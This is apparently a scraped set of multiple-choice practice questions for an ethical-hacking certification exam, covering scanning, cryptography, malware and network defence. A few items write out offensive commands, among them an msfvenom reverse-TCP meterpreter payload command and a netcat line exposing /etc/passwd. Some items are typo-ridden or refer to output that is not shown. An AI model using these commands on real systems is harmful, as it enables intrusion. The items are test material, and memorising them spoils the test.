B.

Cain & Abel

C.

Nessus

D.

Snort

Full Access
Question # 93

Yancey is a network security administrator for a large electric company. This company provides power for over 100, 000 people in Las Vegas. Yancey has worked for his company for over 15 years and has become very successful. One day, Yancey comes in to work and finds out that the company will be downsizing and he will be out of a job in two weeks. Yancey is very angry and decides to place logic bombs, viruses, Trojans, and backdoors all over the network to take down the company once he has left. Yancey does not care if his actions land him in jail for 30 or more years, he just wants the company to pay for what they are doing to him.

What would Yancey be considered?

A.

Yancey would be considered a Suicide Hacker

B.

Since he does not care about going to jail, he would be considered a Black Hat

C.

Because Yancey works for the company currently; he would be a White Hat

D.

Yancey is a Hacktivist Hacker since he is standing up to a company that is downsizing

Full Access
Question # 94

David is a security professional working in an organization, and he is implementing a vulnerability management program in the organization to evaluate and control the risks and vulnerabilities in its IT infrastructure. He is currently executing the process of applying fixes on vulnerable systems to reduce the impact and severity of vulnerabilities. Which phase of the vulnerability-management life cycle is David currently in?

A.

verification

B.

Risk assessment

C.

Vulnerability scan

D.

Remediation

Full Access
Question # 95

You have successfully logged on a Linux system. You want to now cover your trade Your login attempt may be logged on several files located in /var/log. Which file does NOT belongs to the list:

A.

user.log

B.

auth.fesg

C.

wtmp

D.

btmp

Full Access
Question # 96

While browsing his Facebook teed, Matt sees a picture one of his friends posted with the caption. "Learn more about your friends!", as well as a number of personal questions. Matt is suspicious and texts his friend, who confirms that he did indeed post it. With assurance that the post is legitimate. Matt responds to the questions on the post, a few days later. Mates bank account has been accessed, and the password has been changed. What most likely happened?

A.

Matt inadvertently provided the answers to his security questions when responding to the post.

B.

Matt's bank-account login information was brute forced.

C.

Matt Inadvertently provided his password when responding to the post.

D.

Matt's computer was infected with a keylogger.

Full Access
Question # 97

What is the main security service a cryptographic hash provides?

A.

Integrity and ease of computation

B.

Message authentication and collision resistance

C.

Integrity and collision resistance

D.

Integrity and computational in-feasibility

Full Access
Question # 98

Which command can be used to show the current TCP/IP connections?

A.

Netsh

B.

Netstat

C.

Net use connection

D.

Net use

Full Access
Question # 99

Techno Security Inc. recently hired John as a penetration tester. He was tasked with identifying open ports in the target network and determining whether the ports are online and any firewall rule sets are encountered. John decided to perform a TCP SYN ping scan on the target network. Which of the following Nmap commands must John use to perform the TCP SYN ping scan?

A.

nmap -sn -pp < target ip address >

B.

nmap -sn -PO < target IP address >

C.

nmap -sn -PS < target IP address >

D.

nmap -sn -PA < target IP address >

Full Access
Question # 100

In the field of cryptanalysis, what is meant by a “rubber-hose" attack?

A.

Attempting to decrypt cipher text by making logical assumptions about the contents of the original plain text.

B.

Extraction of cryptographic secrets through coercion or torture.

C.

Forcing the targeted key stream through a hardware-accelerated device such as an ASIC.

D.

A backdoor placed into a cryptographic algorithm by its creator.

Full Access
Question # 101

what firewall evasion scanning technique make use of a zombie system that has low network activity as well as its fragment identification numbers?

A.

Decoy scanning

B.

Packet fragmentation scanning

C.

Spoof source address scanning

D.

Idle scanning

Full Access
Question # 102

What does the following command in netcat do?

nc -l -u -p55555 < /etc/passwd

A.

logs the incoming connections to /etc/passwd file

B.

loads the /etc/passwd file to the UDP port 55555

C.

grabs the /etc/passwd file when connected to UDP port 55555

D.

deletes the /etc/passwd file when connected to the UDP port 55555

Full Access
Question # 103

When discussing passwords, what is considered a brute force attack?

A.

You attempt every single possibility until you exhaust all possible combinations or discover the password

B.

You threaten to use the rubber hose on someone unless they reveal their password

C.

You load a dictionary of words into your cracking program

D.

You create hashes of a large number of words and compare it with the encrypted passwords

E.

You wait until the password expires

Full Access
Question # 104

What port number is used by LDAP protocol?

A.

110

B.

389

C.

464

D.

445

Full Access
Question # 105

Emily, an extrovert obsessed with social media, posts a large amount of private information, photographs, and location tags of recently visited places. Realizing this. James, a professional hacker, targets Emily and her acquaintances, conducts a location search to detect their geolocation by using an automated tool, and gathers information to perform other sophisticated attacks. What is the tool employed by James in the above scenario?

A.

ophcrack

B.

Hootsuite

C.

VisualRoute

D.

HULK

Full Access
Question # 106

Matthew, a black hat, has managed to open a meterpreter session to one of the kiosk machines in Evil Corp’s lobby. He checks his current SID, which is S-1-5-21-1223352397-1872883824-861252104-501. What needs to happen before Matthew has full administrator access?

A.

He must perform privilege escalation.

B.

He needs to disable antivirus protection.

C.

He needs to gain physical access.

D.

He already has admin privileges, as shown by the “501” at the end of the SID.

Full Access
Question # 107

Alice, a professional hacker, targeted an organization's cloud services. She infiltrated the targets MSP provider by sending spear-phishing emails and distributed custom-made malware to compromise user accounts and gain remote access to the cloud service. Further, she accessed the target customer profiles with her MSP account, compressed the customer data, and stored them in the MSP. Then, she used this information to launch further attacks on the target organization. Which of the following cloud attacks did Alice perform in the above scenario?

A.

Cloud hopper attack

B.

Cloud cryptojacking

C.

Cloudborne attack

D.

Man-in-the-cloud (MITC) attack

Full Access
Question # 108

Larry, a security professional in an organization, has noticed some abnormalities In the user accounts on a web server. To thwart evolving attacks, he decided to harden the security of the web server by adopting a countermeasures to secure the accounts on the web server.

Which of the following countermeasures must Larry implement to secure the user accounts on the web server?

A.

Enable unused default user accounts created during the installation of an OS

B.

Enable all non-interactive accounts that should exist but do not require interactive login

C.

Limit the administrator or toot-level access to the minimum number of users

D.

Retain all unused modules and application extensions

Full Access
Question # 109

which of the following protocols can be used to secure an LDAP service against anonymous queries?

A.

SSO

B.

RADIUS

C.

WPA

D.

NTLM

Full Access
Question # 110

what is the correct way of using MSFvenom to generate a reverse TCP shellcode for windows?

A.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c

B.

msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c

C.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe

D.

msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe

Full Access
Question # 111

Consider the following Nmap output:

what command-line parameter could you use to determine the type and version number of the web server?

A.

-sv

B.

-Pn

C.

-V

D.

-ss

Full Access
Question # 112

Why containers are less secure that virtual machines?

A.

Host OS on containers has a larger surface attack.

B.

Containers may full fill disk space of the host.

C.

A compromise container may cause a CPU starvation of the host.

D.

Containers are attached to the same virtual network.

Full Access
Question # 113

Elliot is in the process of exploiting a web application that uses SQL as a back-end database. He’s determined that the application is vulnerable to SQL injection, and has introduced conditional timing delays into injected queries to determine whether they are successful. What type of SQL injection is Elliot most likely performing?

A.

Error-based SQL injection

B.

Blind SQL injection

C.

Union-based SQL injection

D.

NoSQL injection

Full Access
Question # 114

Bella, a security professional working at an it firm, finds that a security breach has occurred while transferring important files. Sensitive data, employee usernames. and passwords are shared In plaintext, paving the way for hackers 10 perform successful session hijacking. To address this situation. Bella Implemented a protocol that sends data using encryption and digital certificates. Which of the following protocols Is used by Bella?

A.

FTP

B.

HTTPS

C.

FTPS

D.

IP

Full Access
Question # 115

You are tasked to perform a penetration test. While you are performing information gathering, you find an employee list in Google. You find the receptionist’s email, and you send her an email changing the source email to her boss’s email (boss@company). In this email, you ask for a pdf with information. She reads your email and sends back a pdf with links. You exchange the pdf links with your malicious links (these links contain malware) and send back the modified pdf, saying that the links don’t work. She reads your email, opens the links, and her machine gets infected. You now have access to the company network. What testing method did you use?

A.

Social engineering

B.

Piggybacking

C.

Tailgating

D.

Eavesdropping

Full Access
Question # 116

Under what conditions does a secondary name server request a zone transfer from a primary name server?

A.

When a primary SOA is higher that a secondary SOA

B.

When a secondary SOA is higher that a primary SOA

C.

When a primary name server has had its service restarted

D.

When a secondary name server has had its service restarted

E.

When the TTL falls to zero

Full Access
Question # 117

Peter extracts the SIDs list from Windows 2000 Server machine using the hacking tool "SIDExtractor". Here is the output of the SIDs:

From the above list identify the user account with System Administrator privileges.

A.

John

B.

Rebecca

C.

Sheela

D.

Shawn

E.

Somia

F.

Chang

G.

Micah

Full Access
Question # 118

PGP, SSL, and IKE are all examples of which type of cryptography?

A.

Digest

B.

Secret Key

C.

Public Key

D.

Hash Algorithm

Full Access
Question # 119

What kind of detection techniques is being used in antivirus software that identifies malware by collecting data from multiple protected systems and instead of analyzing files locally it’s made on the provider’s environment?

A.

Behavioral based

B.

Heuristics based

C.

Honeypot based

D.

Cloud based

Full Access
Question # 120

Todd has been asked by the security officer to purchase a counter-based authentication system. Which of the following best describes this type of system?

A.

A biometric system that bases authentication decisions on behavioral attributes.

B.

A biometric system that bases authentication decisions on physical attributes.

C.

An authentication system that creates one-time passwords that are encrypted with secret keys.

D.

An authentication system that uses passphrases that are converted into virtual passwords.

Full Access
Question # 121

Which of the following is the BEST way to defend against network sniffing?

A.

Using encryption protocols to secure network communications

B.

Register all machines MAC Address in a Centralized Database

C.

Use Static IP Address

D.

Restrict Physical Access to Server Rooms hosting Critical Servers

Full Access
Question # 122

A company’s policy requires employees to perform file transfers using protocols which encrypt traffic. You suspect some employees are still performing file transfers using unencrypted protocols because the employees do not like changes. You have positioned a network sniffer to capture traffic from the laptops used by employees in the data ingest department. Using Wireshark to examine the captured traffic, which command can be used as display filter to find unencrypted file transfers?

A.

tcp.port = = 21

B.

tcp.port = 23

C.

tcp.port = = 21 | | tcp.port = =22

D.

tcp.port ! = 21

Full Access
Question # 123

is a set of extensions to DNS that provide the origin authentication of DNS data to DNS clients (resolvers) so as to reduce the threat of DNS poisoning, spoofing, and similar types of attacks.

A.

DNSSEC

B.

Resource records

C.

Resource transfer

D.

Zone transfer

Full Access
Question # 124

Which of the following tools are used for enumeration? (Choose three.)

A.

SolarWinds

B.

USER2SID

C.

Cheops

D.

SID2USER

E.

DumpSec

Full Access
Question # 125

What tool can crack Windows SMB passwords simply by listening to network traffic?

A.

This is not possible

B.

Netbus

C.

NTFSDOS

D.

L0phtcrack

Full Access
Question # 126

You just set up a security system in your network. In what kind of system would you find the following string of characters used as a rule within its configuration? alert tcp any any -> 192.168.100.0/24 21 (msg: ““FTP on the network!””;)

A.

A firewall IPTable

B.

FTP Server rule

C.

A Router IPTable

D.

An Intrusion Detection System

Full Access
Question # 127

A network admin contacts you. He is concerned that ARP spoofing or poisoning might occur on his network. What are some things he can do to prevent it? Select the best answers.

A.

Use port security on his switches.

B.

Use a tool like ARPwatch to monitor for strange ARP activity.

C.

Use a firewall between all LAN segments.

D.

If you have a small network, use static ARP entries.

E.

Use only static IP addresses on all PC's.

Full Access
Question # 128

What is the purpose of a demilitarized zone on a network?

A.

To scan all traffic coming through the DMZ to the internal network

B.

To only provide direct access to the nodes within the DMZ and protect the network behind it

C.

To provide a place to put the honeypot

D.

To contain the network devices you wish to protect

Full Access
Question # 129

What did the following commands determine?

A.

That the Joe account has a SID of 500

B.

These commands demonstrate that the guest account has NOT been disabled

C.

These commands demonstrate that the guest account has been disabled

D.

That the true administrator is Joe

E.

Issued alone, these commands prove nothing

Full Access
Question # 130

Which of the following tools is used to detect wireless LANs using the 802.11a/b/g/n WLAN standards on a linux platform?

A.

Kismet

B.

Abel

C.

Netstumbler

D.

Nessus

Full Access
Question # 131

CompanyXYZ has asked you to assess the security of their perimeter email gateway. From your office in New York, you craft a specially formatted email message and send it across the Internet to an employee of CompanyXYZ. The employee of CompanyXYZ is aware of your test. Your email message looks like this:

From: jim_miller@companyxyz.com

To: michelle_saunders@companyxyz.com Subject: Test message

Date: 4/3/2017 14:37

The employee of CompanyXYZ receives your email message.

This proves that CompanyXYZ’s email gateway doesn’t prevent what?

A.

Email Masquerading

B.

Email Harvesting

C.

Email Phishing

D.

Email Spoofing

Full Access
Question # 132

Email is transmitted across the Internet using the Simple Mail Transport Protocol. SMTP does not encrypt email, leaving the information in the message vulnerable to being read by an unauthorized person. SMTP can upgrade a connection between two mail servers to use TLS. Email transmitted by SMTP over TLS is encrypted. What is the name of the command used by SMTP to transmit email over TLS?

A.

OPPORTUNISTICTLS

B.

UPGRADETLS

C.

FORCETLS

D.

STARTTLS

Full Access
Question # 133

Which mode of IPSec should you use to assure security and confidentiality of data within the same LAN?

A.

ESP transport mode

B.

ESP confidential

C.

AH permiscuous

D.

AH Tunnel mode

Full Access
Question # 134

What ports should be blocked on the firewall to prevent NetBIOS traffic from not coming through the firewall if your network is comprised of Windows NT, 2000, and XP?

A.

110

B.

135

C.

139

D.

161

E.

445

F.

1024

Full Access
Question # 135

Susan has attached to her company's network. She has managed to synchronize her boss's sessions with that of the file server. She then intercepted his traffic destined for the server, changed it the way she wanted to and then placed it on the server in his home directory.

What kind of attack is Susan carrying on?

A.

A sniffing attack

B.

A spoofing attack

C.

A man in the middle attack

D.

A denial of service attack

Full Access
Question # 136

Your company performs penetration tests and security assessments for small and medium-sized business in the local area. During a routine security assessment, you discover information that suggests your client is involved with human trafficking.

What should you do?

A.

Confront the client in a respectful manner and ask her about the data.

B.

Copy the data to removable media and keep it in case you need it.

C.

Ignore the data and continue the assessment until completed as agreed.

D.

Immediately stop work and contact the proper legal authorities.

Full Access
Question # 137

Which of the following describes the characteristics of a Boot Sector Virus?

A.

Modifies directory table entries so that directory entries point to the virus code instead of the actual program.

B.

Moves the MBR to another location on the RAM and copies itself to the original location of the MBR.

C.

Moves the MBR to another location on the hard disk and copies itself to the original location of the MBR.

D.

Overwrites the original MBR and only executes the new virus code.

Full Access
Question # 138

A hacker is an intelligent individual with excellent computer skills and the ability to explore a computer’s software and hardware without the owner’s permission. Their intention can either be to simply gain knowledge or to illegally make changes.

Which of the following class of hacker refers to an individual who works both offensively and defensively at various times?

A.

White Hat

B.

Suicide Hacker

C.

Gray Hat

D.

Black Hat

Full Access
Question # 139

“........is an attack type for a rogue Wi-Fi access point that appears to be a legitimate one offered on the premises, but actually has been set up to eavesdrop on wireless communications. It is the wireless version of the phishing scam. An attacker fools wireless users into connecting a laptop or mobile phone to a tainted hot-spot by posing as a legitimate provider. This type of attack may be used to steal the passwords of

unsuspecting users by either snooping the communication link or by phishing, which involves setting up a fraudulent web site and luring people there.”

Fill in the blank with appropriate choice.

A.

Evil Twin Attack

B.

Sinkhole Attack

C.

Collision Attack

D.

Signal Jamming Attack

Full Access
Question # 140

Which of the following tools can be used for passive OS fingerprinting?

A.

nmap

B.

tcpdump

C.

tracert

D.

ping

Full Access
Question # 141

Which Intrusion Detection System is the best applicable for large environments where critical assets on the network need extra scrutiny and is ideal for observing sensitive network segments?

A.

Honeypots

B.

Firewalls

C.

Network-based intrusion detection system (NIDS)

D.

Host-based intrusion detection system (HIDS)

Full Access
Question # 142

One of your team members has asked you to analyze the following SOA record. What is the version?

Rutgers.edu.SOA NS1.Rutgers.edu ipad.college.edu (200302028 3600 3600 604800 2400.) (Choose four.)

A.

200303028

B.

3600

C.

604800

D.

2400

E.

60

F.

4800

Full Access
Question # 143

In the field of cryptanalysis, what is meant by a “rubber-hose” attack?

A.

Forcing the targeted keystream through a hardware-accelerated device such as an ASIC.

B.

A backdoor placed into a cryptographic algorithm by its creator.

C.

Extraction of cryptographic secrets through coercion or torture.

D.

Attempting to decrypt ciphertext by making logical assumptions about the contents of the original plaintext.

Full Access
Question # 144

The “Gray-box testing” methodology enforces what kind of restriction?

A.

Only the external operation of a system is accessible to the tester.

B.

The internal operation of a system in only partly accessible to the tester.

C.

Only the internal operation of a system is known to the tester.

D.

The internal operation of a system is completely known to the tester.

Full Access
Question # 145

A bank stores and processes sensitive privacy information related to home loans. However, auditing has never been enabled on the system. What is the first step that the bank should take before enabling the audit feature?

A.

Perform a vulnerability scan of the system.

B.

Determine the impact of enabling the audit feature.

C.

Perform a cost/benefit analysis of the audit feature.

D.

Allocate funds for staffing of audit log review.

Full Access
Question # 146

What does the –oX flag do in an Nmap scan?

A.

Perform an eXpress scan

B.

Output the results in truncated format to the screen

C.

Output the results in XML format to a file

D.

Perform an Xmas scan

Full Access
Question # 147

What is the way to decide how a packet will move from an untrusted outside host to a protected inside that is behind a firewall, which permits the hacker to determine which ports are open and if the packets can pass through the packet-filtering of the firewall?

A.

Session hijacking

B.

Firewalking

C.

Man-in-the middle attack

D.

Network sniffing

Full Access
Question # 148

Which of the following program infects the system boot sector and the executable files at the same time?

A.

Polymorphic virus

B.

Stealth virus

C.

Multipartite Virus

D.

Macro virus

Full Access
Question # 149

When you are getting information about a web server, it is very important to know the HTTP Methods (GET, POST, HEAD, PUT, DELETE, TRACE) that are available because there are two critical methods (PUT and DELETE). PUT can upload a file to the server and DELETE can delete a file from the server. You can detect all these methods (GET, POST, HEAD, DELETE, PUT, TRACE) using NMAP script engine. What Nmap script will help you with this task?

A.

http-methods

B.

http enum

C.

http-headers

D.

http-git

Full Access
Question # 150

Identify the UDP port that Network Time Protocol (NTP) uses as its primary means of communication?

A.

113

B.

69

C.

123

D.

161

Full Access
Question # 151

What is correct about digital signatures?

A.

A digital signature cannot be moved from one signed document to another because it is the hash of the original document encrypted with the private key of the signing party.

B.

Digital signatures may be used in different documents of the same type.

C.

A digital signature cannot be moved from one signed document to another because it is a plain hash of the document content.

D.

Digital signatures are issued once for each user and can be used everywhere until they expire.

Full Access
Question # 152

What is a NULL scan?

A.

A scan in which all flags are turned off

B.

A scan in which certain flags are off

C.

A scan in which all flags are on

D.

A scan in which the packet size is set to zero

E.

A scan with an illegal packet size

Full Access
Question # 153

What does a firewall check to prevent particular ports and applications from getting packets into an organization?

A.

Transport layer port numbers and application layer headers

B.

Presentation layer headers and the session layer port numbers

C.

Network layer headers and the session layer port numbers

D.

Application layer port numbers and the transport layer headers

Full Access
Question # 154

Why should the security analyst disable/remove unnecessary ISAPI filters?

A.

To defend against social engineering attacks

B.

To defend against webserver attacks

C.

To defend against jailbreaking

D.

To defend against wireless attacks

Full Access
Question # 155

Which of the following viruses tries to hide from anti-virus programs by actively altering and corrupting the chosen service call interruptions when they are being run?

A.

Macro virus

B.

Stealth/Tunneling virus

C.

Cavity virus

D.

Polymorphic virus

Full Access
Question # 156

Which of the following tools can be used to perform a zone transfer?

A.

NSLookup

B.

Finger

C.

Dig

D.

Sam Spade

E.

Host

F.

Netcat

G.

Neotrace

Full Access
Question # 157

Which address translation scheme would allow a single public IP address to always correspond to a single machine on an internal network, allowing "server publishing"?

A.

Overloading Port Address Translation

B.

Dynamic Port Address Translation

C.

Dynamic Network Address Translation

D.

Static Network Address Translation

Full Access
Question # 158

Steve, a scientist who works in a governmental security agency, developed a technological solution to identify people based on walking patterns and implemented this approach to a physical control access.

A camera captures people walking and identifies the individuals using Steve’s approach.

After that, people must approximate their RFID badges. Both the identifications are required to open the door. In this case, we can say:

A.

Although the approach has two phases, it actually implements just one authentication factor

B.

The solution implements the two authentication factors: physical object and physical characteristic

C.

The solution will have a high level of false positives

D.

Biological motion cannot be used to identify people

Full Access
Question # 159

Which of the following is assured by the use of a hash?

A.

Authentication

B.

Confidentiality

C.

Availability

D.

Integrity

Full Access
Question # 160

Which of the following is not a Bluetooth attack?

A.

Bluedriving

B.

Bluesmacking

C.

Bluejacking

D.

Bluesnarfing

Full Access
Question # 161

Which is the first step followed by Vulnerability Scanners for scanning a network?

A.

OS Detection

B.

Firewall detection

C.

TCP/UDP Port scanning

D.

Checking if the remote host is alive

Full Access
Question # 162

What is the proper response for a NULL scan if the port is closed?

A.

SYN

B.

ACK

C.

FIN

D.

PSH

E.

RST

F.

No response

Full Access
Question # 163

Which system consists of a publicly available set of databases that contain domain name registration contact information?

A.

WHOIS

B.

CAPTCHA

C.

IANA

D.

IETF

Full Access
Question # 164

The collection of potentially actionable, overt, and publicly available information is known as

A.

Open-source intelligence

B.

Real intelligence

C.

Social intelligence

D.

Human intelligence

Full Access
Question # 165

What is not a PCI compliance recommendation?

A.

Use a firewall between the public network and the payment card data.

B.

Use encryption to protect all transmission of card holder data over any public network.

C.

Rotate employees handling credit card transactions on a yearly basis to different departments.

D.

Limit access to card holder data to as few individuals as possible.

Full Access
Question # 166

An attacker has installed a RAT on a host. The attacker wants to ensure that when a user attempts to go to "www.MyPersonalBank.com ", the user is directed to a phishing site.

Which file does the attacker need to modify?

A.

Boot.ini

B.

Sudoers

C.

Networks

D.

Hosts

Full Access
Question # 167

Which method of password cracking takes the most time and effort?

A.

Dictionary attack

B.

Shoulder surfing

C.

Rainbow tables

D.

Brute force

Full Access
Question # 168

Tess King is using the nslookup command to craft queries to list all DNS information (such as Name Servers, host names, MX records, CNAME records, glue records (delegation for child Domains), zone serial number, TimeToLive (TTL) records, etc) for a Domain.

What do you think Tess King is trying to accomplish? Select the best answer.

A.

A zone harvesting

B.

A zone transfer

C.

A zone update

D.

A zone estimate

Full Access
Question # 169

What two conditions must a digital signature meet?

A.

Has to be the same number of characters as a physical signature and must be unique.

B.

Has to be unforgeable, and has to be authentic.

C.

Must be unique and have special characters.

D.

Has to be legible and neat.

Full Access
Question # 170

Null sessions are un-authenticated connections (not using a username or password.) to an NT or 2000 system. Which TCP and UDP ports must you filter to check null sessions on your network?

A.

137 and 139

B.

137 and 443

C.

139 and 443

D.

139 and 445

Full Access
Question # 171

What term describes the amount of risk that remains after the vulnerabilities are classified and the countermeasures have been deployed?

A.

Residual risk

B.

Impact risk

C.

Deferred risk

D.

Inherent risk

Full Access